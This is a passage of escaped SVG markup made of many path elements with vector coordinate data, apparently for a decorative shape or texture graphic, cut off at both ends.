d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7